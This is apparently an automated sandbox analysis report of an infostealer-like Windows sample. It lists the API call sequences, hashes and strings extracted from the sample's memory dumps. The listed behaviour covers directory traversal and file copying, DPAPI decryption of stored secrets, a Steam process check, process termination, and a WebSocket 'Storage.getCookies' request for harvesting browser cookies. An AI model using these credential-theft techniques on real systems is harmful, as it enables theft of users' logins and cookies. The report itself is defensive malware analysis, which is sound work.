                          • Opcode Fuzzy Hash: c4b74769114b713f627fa1af7ac0ecb7a329170a52fe1645dd556dd1b1344424
                          • Instruction Fuzzy Hash: AA814071A102169BCB21EF69DD89AAF77B5AF44304F04113AF805B72E1CB789D05CFA9
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 0041DD45
                          • RtlAllocateHeap.NTDLL(00000000), ref: 0041DD4C
                          • wsprintfA.USER32 ref: 0041DD62
                          • FindFirstFileA.KERNEL32(?,?), ref: 0041DD79
                          • StrCmpCA.SHLWAPI(?,004317A0), ref: 0041DD9C
                          • StrCmpCA.SHLWAPI(?,004317A4), ref: 0041DDB6
                          • wsprintfA.USER32 ref: 0041DDD4
                          • DeleteFileA.KERNEL32(?), ref: 0041DE20
                          • CopyFileA.KERNEL32(?,?,00000001), ref: 0041DDED
                            • Part of subcall function 00401530: lstrcpy.KERNEL32(00000000,?), ref: 00401557
                            • Part of subcall function 00401530: lstrcpy.KERNEL32(00000000,?), ref: 00401579
                            • Part of subcall function 00401530: lstrcpy.KERNEL32(00000000,?), ref: 0040159B
                            • Part of subcall function 00401530: lstrcpy.KERNEL32(00000000,?), ref: 004015FF
                            • Part of subcall function 0041D980: memset.MSVCRT ref: 0041D9A1
                            • Part of subcall function 0041D980: memset.MSVCRT ref: 0041D9B3
                            • Part of subcall function 0041D980: SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0041D9DB
                            • Part of subcall function 0041D980: lstrcpy.KERNEL32(00000000,?), ref: 0041DA0E
                            • Part of subcall function 0041D980: lstrcat.KERNEL32(?,00000000), ref: 0041DA1C
                            • Part of subcall function 0041D980: lstrcat.KERNEL32(?,00FBE020), ref: 0041DA36
                            • Part of subcall function 0041D980: lstrcat.KERNEL32(?,?), ref: 0041DA4A
                            • Part of subcall function 0041D980: lstrcat.KERNEL32(?,00FBCF80), ref: 0041DA5E
                            • Part of subcall function 0041D980: lstrcpy.KERNEL32(00000000,?), ref: 0041DA8E
                            • Part of subcall function 0041D980: GetFileAttributesA.KERNEL32(00000000), ref: 0041DA95
                          • FindNextFileA.KERNEL32(00000000,?), ref: 0041DE2E
                          • FindClose.KERNEL32(00000000), ref: 0041DE3D
                          • lstrcat.KERNEL32(?,00FBE558), ref: 0041DE66
                          • lstrcat.KERNEL32(?,00FBD888), ref: 0041DE7A
                          • lstrlen.KERNEL32(?), ref: 0041DE84
                          • lstrlen.KERNEL32(?), ref: 0041DE92
                          • lstrcpy.KERNEL32(00000000,?), ref: 0041DED2
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$File$Find$Heaplstrlenmemsetwsprintf$AllocateAttributesCloseCopyDeleteFirstFolderNextPathProcess
                          • String ID: %s\%s$%s\*
                          • API String ID: 4184593125-2848263008
                          • Opcode ID: 02361839c3335e14677988f495c9c60b2613d832e63fee47048b7607bb187ef6
                          • Instruction ID: 8e765018a87a922bf1a7945002e3e7802f3d07d980159455bd21fa8f0dbe841d
                          • Opcode Fuzzy Hash: 02361839c3335e14677988f495c9c60b2613d832e63fee47048b7607bb187ef6
                          • Instruction Fuzzy Hash: 6A615271A10208AFCB14EF74DD89AEE77B9BF48304F0045A9B506A7291DF78AA44CF94
                          APIs
                          • wsprintfA.USER32 ref: 0041D54D
                          • FindFirstFileA.KERNEL32(?,?), ref: 0041D564
                          • StrCmpCA.SHLWAPI(?,004317A0), ref: 0041D584
                          • StrCmpCA.SHLWAPI(?,004317A4), ref: 0041D59E
                          • lstrcat.KERNEL32(?,00FBE558), ref: 0041D5E3
                          • lstrcat.KERNEL32(?,00FBE448), ref: 0041D5F7
                          • lstrcat.KERNEL32(?,?), ref: 0041D60B
                          • lstrcat.KERNEL32(?,?), ref: 0041D61C
                          • lstrcat.KERNEL32(?,00431794), ref: 0041D62E
                          • lstrcat.KERNEL32(?,?), ref: 0041D642
                          • lstrcpy.KERNEL32(00000000,?), ref: 0041D682
                          • lstrcpy.KERNEL32(00000000,?), ref: 0041D6D2
                          • FindNextFileA.KERNEL32(00000000,?), ref: 0041D737
                          • FindClose.KERNEL32(00000000), ref: 0041D746
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$Find$Filelstrcpy$CloseFirstNextwsprintf
                          • String ID: %s\%s
                          • API String ID: 50252434-4073750446
                          • Opcode ID: 44c44d3d5a429963cdbbbe44b561e65687e71cf8a3ef74131a8121fdbe04ad55
                          • Instruction ID: d6332d1f3379cec880f4289751697fa87a54eef7f15c0f025c7746e4ec670789
                          • Opcode Fuzzy Hash: 44c44d3d5a429963cdbbbe44b561e65687e71cf8a3ef74131a8121fdbe04ad55
                          • Instruction Fuzzy Hash: B96187B1E102199FCB10EF74DD88ADE77B5EF48304F0054A9F549A3290DB78AA44CF94
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Xinvalid_argumentstd::_
                          • String ID: Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: $Sec-WebSocket-Version: 13$ HTTP/1.1Host: $:$ws://${"id":1,"method":"Storage.getCookies"}
                          • API String ID: 909987262-758292691
                          • Opcode ID: 56a04f1eb05b034cab75dcfc36c9d33e9f8efd01f4268ea83902ab4082dd2414
                          • Instruction ID: 05e3be9d33a30296401f404f65a7cedce3420285136b0224518c6eb8c190ad0c
                          • Opcode Fuzzy Hash: 56a04f1eb05b034cab75dcfc36c9d33e9f8efd01f4268ea83902ab4082dd2414
                          • Instruction Fuzzy Hash: 04A26A71E01229DFDB10DFA8D9407EDBBB6AF88304F5481AAD508A7381DB745E85CF94
                          APIs
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 004123D4
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 004123F7
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00412402
                          • lstrlen.KERNEL32(\*.*), ref: 0041240D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0041242A
                          • lstrcat.KERNEL32(00000000,\*.*), ref: 00412436
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0041246A
                          • FindFirstFileA.KERNEL32(00000000,?), ref: 00412486
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                          • String ID: \*.*
                          • API String ID: 2567437900-1173974218
                          • Opcode ID: 5606a01231798ee82edad9dfca8401c1de57e1125b12495288f1a07e3e415015
                          • Instruction ID: 37ad96a8048201130d174f68a748bc82764b04fc949853bab6f79276fc789aa1
                          • Opcode Fuzzy Hash: 5606a01231798ee82edad9dfca8401c1de57e1125b12495288f1a07e3e415015
                          • Instruction Fuzzy Hash: 874152307102158BC722EF29DE89ADF73A5AF14308F00513AB849E72E1CFB89C458F98
                          APIs
                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 004246B9
                          • Process32First.KERNEL32(00000000,00000128), ref: 004246C9
                          • Process32Next.KERNEL32(00000000,00000128), ref: 004246DB
                          • StrCmpCA.SHLWAPI(?,?), ref: 004246ED
                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00424702
                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 00424711
                          • CloseHandle.KERNEL32(00000000), ref: 00424718
                          • Process32Next.KERNEL32(00000000,00000128), ref: 00424726
                          • CloseHandle.KERNEL32(00000000), ref: 00424731
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                          • String ID:
                          • API String ID: 3836391474-0
                          • Opcode ID: 31794d220843fc32869daf0815515cd9fdb01cafa73083098f7cfc23eab11e6d
                          • Instruction ID: c0af82d2220ffa974d571ce9e7a5dccbaa51854a96d9eb04d24fe49588ec8ce6
                          • Opcode Fuzzy Hash: 31794d220843fc32869daf0815515cd9fdb01cafa73083098f7cfc23eab11e6d
                          • Instruction Fuzzy Hash: 4101A1316012246BE7205B60AC88FFB777DEB85B41F00009DF90592180EFB899408EB4
                          APIs
                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000), ref: 00424628
                          • Process32First.KERNEL32(00000000,00000128), ref: 00424638
                          • Process32Next.KERNEL32(00000000,00000128), ref: 0042464A
                          • StrCmpCA.SHLWAPI(?,steam.exe), ref: 00424660
                          • Process32Next.KERNEL32(00000000,00000128), ref: 00424672
                          • CloseHandle.KERNEL32(00000000), ref: 0042467D
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process32$Next$CloseCreateFirstHandleSnapshotToolhelp32
                          • String ID: steam.exe
                          • API String ID: 2284531361-2826358650
                          • Opcode ID: bc1922ece39328686c400ed79e45fdf5ef3b47e6cc89be6fbc9388eb7eed7652
                          • Instruction ID: 4aafca094f55d4fa665927c4da91c0dafdebdc220363f53a4f6808c672df9c75
                          • Opcode Fuzzy Hash: bc1922ece39328686c400ed79e45fdf5ef3b47e6cc89be6fbc9388eb7eed7652
                          • Instruction Fuzzy Hash: 890162716012249BE7209B70AC89FEB77BDEF49750F4401DAF908D2140EFB899948FE5
                          APIs
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 00414B51
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00414B74
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00414B7F
                          • lstrlen.KERNEL32(00434CA8), ref: 00414B8A
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00414BA7
                          • lstrcat.KERNEL32(00000000,00434CA8), ref: 00414BB3
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00414BDE
                          • FindFirstFileA.KERNEL32(00000000,?), ref: 00414BFA
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                          • String ID:
                          • API String ID: 2567437900-0
                          • Opcode ID: d3f93e8c6116b67d666939df329622ea89059412740c0aa47a945d6ddda3b822
                          • Instruction ID: 4dbd3cd07a2629b2c982ad2ca07760dbd8a2ad2fcb84496f2e545fc852b2e6a3
                          • Opcode Fuzzy Hash: d3f93e8c6116b67d666939df329622ea89059412740c0aa47a945d6ddda3b822
                          • Instruction Fuzzy Hash: 153130317115159BC722EF29EE89A9F77B5AF80314F00113AB805A72D1CFB8EC458FA8
                          APIs
                            • Part of subcall function 004271E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 004271FE
                          • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00422D9B
                          • LocalAlloc.KERNEL32(00000040,00000000), ref: 00422DAD
                          • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00422DBA
                          • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00422DEC
                          • LocalFree.KERNEL32(00000000), ref: 00422FCA
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                          • String ID: /
                          • API String ID: 3090951853-4001269591
                          • Opcode ID: 6caac9e4e9da962acb08f16bfc44d7664d89c46914e57893374660aea1a7ed6d
                          • Instruction ID: 7ad3dd5c0188483891bc65089340f002ce2889567c347d74d5712d79ac24ba56
                          • Opcode Fuzzy Hash: 6caac9e4e9da962acb08f16bfc44d7664d89c46914e57893374660aea1a7ed6d
                          • Instruction Fuzzy Hash: BFB13D70A00224DFC714CF14DA48B56B7F1FB44319F6AC1AAD409AB3A1D7BA9D82DF94
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: &?N$(CO$+uk$3>$W;mj$vg6_$}82o
                          • API String ID: 0-1634606787
                          • Opcode ID: 06ac34ce36053163f00b6fd6054f725ef4223c31285d1708a31fa43c00ea03d5
                          • Instruction ID: 4a6b9ca01f9627e97560ed5c810943769df90f9b3c8d6c3b50fe192a61e8064b
                          • Opcode Fuzzy Hash: 06ac34ce36053163f00b6fd6054f725ef4223c31285d1708a31fa43c00ea03d5
                          • Instruction Fuzzy Hash: C9B219F360C2049FE304AE2DDC8567AB7EAEFD4720F1A853DE6C5C7744EA3598018696
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: %w_$*g7s$4<w$O~V$t m$G~m$Kgu
                          • API String ID: 0-2981182066
                          • Opcode ID: dd33459cc40e7178d30ce3e1bc3ed23b3dd0a46f5b31f9b09f5f67aecd9382c3
                          • Instruction ID: 6b6e83da0482b9fdcb29ab4415d500a82d5c4e005af69457b7f910d16e1fe57d
                          • Opcode Fuzzy Hash: dd33459cc40e7178d30ce3e1bc3ed23b3dd0a46f5b31f9b09f5f67aecd9382c3
                          • Instruction Fuzzy Hash: D7B24AF360C2149FE7046E2DEC8567AFBE9EF94320F1A493DE6C4C3744EA7558058692
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: &&/{$,a;$3?uT$>0q{$S$4|$[6Sf$fg>_
                          • API String ID: 0-3412472070
                          • Opcode ID: debd296cec69df62c5d786e4e89f34246426bf2f286cd8e594a667496171d0b4
                          • Instruction ID: 4a6a2e6b7d999017bc519eaefae5c5a1a6ea0d07949ca065f62f6decdf6e6a10
                          • Opcode Fuzzy Hash: debd296cec69df62c5d786e4e89f34246426bf2f286cd8e594a667496171d0b4
                          • Instruction Fuzzy Hash: 59B2E6F360C2049FE304AE2DEC8567AFBE9EF94720F16493DE6C4C7744EA3598058696
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: .EXC$PVo{$W@ $oOp$v;?_$vO
                          • API String ID: 0-2813548161
                          • Opcode ID: 2076de428e6a670a7d157a5c37541cde7b780caa34374467fe66b34af30c3b26
                          • Instruction ID: 5d790b9f97de9a55233ed8f7192376bdade5d05ea6bfa1579a7632f5e13c3de0
                          • Opcode Fuzzy Hash: 2076de428e6a670a7d157a5c37541cde7b780caa34374467fe66b34af30c3b26
                          • Instruction Fuzzy Hash: 80B237F360C2049FE304AE2DEC8567ABBEAEBD4320F1A453DE6C5C7744E93598058697
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 00422C42
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00422C49
                          • GetTimeZoneInformation.KERNEL32(?), ref: 00422C58
                          • wsprintfA.USER32 ref: 00422C83
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                          • String ID: wwww
                          • API String ID: 3317088062-671953474
                          • Opcode ID: b0b5cb2ad12498860437fa942ab6e36db069a5d5969e1f97bbf7c175483cae77
                          • Instruction ID: b2d0bd2ac6cfd638374cf8de6dd304188861d3aa3a7e02ed7006079713995a6c
                          • Opcode Fuzzy Hash: b0b5cb2ad12498860437fa942ab6e36db069a5d5969e1f97bbf7c175483cae77
                          • Instruction Fuzzy Hash: 2301F771A04614ABD71C8B58DC4AB6AB76AEB84721F10432AF916D73C0D7B419008AE5
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: &`m$R]]$`K}o$qur\$t\nO
                          • API String ID: 0-2438534936
                          • Opcode ID: 0f295d1111386a05324f7a08156b82dc993a2b63e72fea4e480c01f4cd887fca
                          • Instruction ID: 3292a079d65f720cd0aac379db5a5be31bcfeb221f53939920bf269c6ac4cf89
                          • Opcode Fuzzy Hash: 0f295d1111386a05324f7a08156b82dc993a2b63e72fea4e480c01f4cd887fca
                          • Instruction Fuzzy Hash: 73B2F5F3A082009FE704AE2DEC4577ABBE5EFD4720F1A893DE6C4C3744E63598058696
                          APIs
                          • GetProcessHeap.KERNEL32(00000008,00000400), ref: 0040775E
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00407765
                          • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 0040778D
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 004077AD
                          • LocalFree.KERNEL32(?), ref: 004077B7
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                          • String ID:
                          • API String ID: 2609814428-0
                          • Opcode ID: 6d1bfcca655919d7eab847b087b3d766d6f88c0200bb541f3522876a5bbf2ac9
                          • Instruction ID: 1a725d20c68c60ec7f3e027db1d0bf620a8c7a6af013d4c7a88df0b6a2bd9b64
                          • Opcode Fuzzy Hash: 6d1bfcca655919d7eab847b087b3d766d6f88c0200bb541f3522876a5bbf2ac9
                          • Instruction Fuzzy Hash: 6A011275B44318BBEB14DB949C4AFAA7B79EB44B15F104159FA05EB2C0D6B0A900CBE4
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 4?Kk$6X}h$n?|$pL[|
                          • API String ID: 0-850682632
                          • Opcode ID: e2538894506d50a5f88044dacdf3821c094b235a5278d06d35a2ca747ebf3503
                          • Instruction ID: 9df98bf7140312b7085f3d82611533dd42e0504502c70c329ac552477ff3cd94
                          • Opcode Fuzzy Hash: e2538894506d50a5f88044dacdf3821c094b235a5278d06d35a2ca747ebf3503
                          • Instruction Fuzzy Hash: C1B2F5F360C2049FE7046E2DEC8566AFBE9EF94720F1A493DEAC4C7744E63598018697
                          APIs
                            • Part of subcall function 004271E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 004271FE
                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00423A96
                          • Process32First.KERNEL32(00000000,00000128), ref: 00423AA9
                          • Process32Next.KERNEL32(00000000,00000128), ref: 00423ABF
                            • Part of subcall function 00427310: lstrlen.KERNEL32(------,00405BEB), ref: 0042731B
                            • Part of subcall function 00427310: lstrcpy.KERNEL32(00000000), ref: 0042733F
                            • Part of subcall function 00427310: lstrcat.KERNEL32(?,------), ref: 00427349
                            • Part of subcall function 00427280: lstrcpy.KERNEL32(00000000), ref: 004272AE
                          • CloseHandle.KERNEL32(00000000), ref: 00423BF7
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                          • String ID:
                          • API String ID: 1066202413-0
                          • Opcode ID: 49579a6b685d4f0f0103baf5644634ac2fcfc3f96350a6441b66680175cd71cd
                          • Instruction ID: e51cc00c34693d79734f6d5c1490cc69d98379875bceab306ad95a5bdef0a7c3
                          • Opcode Fuzzy Hash: 49579a6b685d4f0f0103baf5644634ac2fcfc3f96350a6441b66680175cd71cd
                          • Instruction Fuzzy Hash: 5381F931A00224CFC714CF15E948B96B7B1FB45315F69C1AED409AB3A2D77AAD82CF94
                          APIs
                          • lstrlen.KERNEL32(?,00000001,?,?,00000000,00000000), ref: 0040EA76
                          • CryptStringToBinaryA.CRYPT32(?,00000000,?,00000001,?,?,00000000), ref: 0040EA7E
                          • lstrcat.KERNEL32(0042CFEC,0042CFEC), ref: 0040EB27
                          • lstrcat.KERNEL32(0042CFEC,0042CFEC), ref: 0040EB49
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$BinaryCryptStringlstrlen
                          • String ID:
                          • API String ID: 189259977-0
                          • Opcode ID: e83a5e54b61dfc76abc0d04699baaf89736fffa06499f80dd4cfcf4e1ca2cc2a
                          • Instruction ID: 1f066aa5abf7061ceb93934b663a37ce6f19afdfb086fbf955777a802f987be8
                          • Opcode Fuzzy Hash: e83a5e54b61dfc76abc0d04699baaf89736fffa06499f80dd4cfcf4e1ca2cc2a
                          • Instruction Fuzzy Hash: 7F31B275B00218ABDB10DB59EC45FEFB77A9F84705F0441AAFA09E3280DBB45A14CBE5
                          APIs
                          • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,?,?,?,?), ref: 004240CD
                          • GetProcessHeap.KERNEL32(00000000,?,?,?), ref: 004240DC
                          • RtlAllocateHeap.NTDLL(00000000), ref: 004240E3
                          • CryptBinaryToStringA.CRYPT32(?,?,40000001,?,?,?,?,?,?), ref: 00424113
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: BinaryCryptHeapString$AllocateProcess
                          • String ID:
                          • API String ID: 3825993179-0
                          • Opcode ID: 1654423fd72de82e54ce634d70b22f0d0a00e139ff6f7135eda8dce405f6aeb9
                          • Instruction ID: 804da95bf751652d27495f4eafff97b2fff01ecd0487fb5237b818349f7ed981
                          • Opcode Fuzzy Hash: 1654423fd72de82e54ce634d70b22f0d0a00e139ff6f7135eda8dce405f6aeb9
                          • Instruction Fuzzy Hash: FD011A70600215ABDB149FA5EC89BABBBAEEF85311F108159BE0987340DA719980CBA4
                          APIs
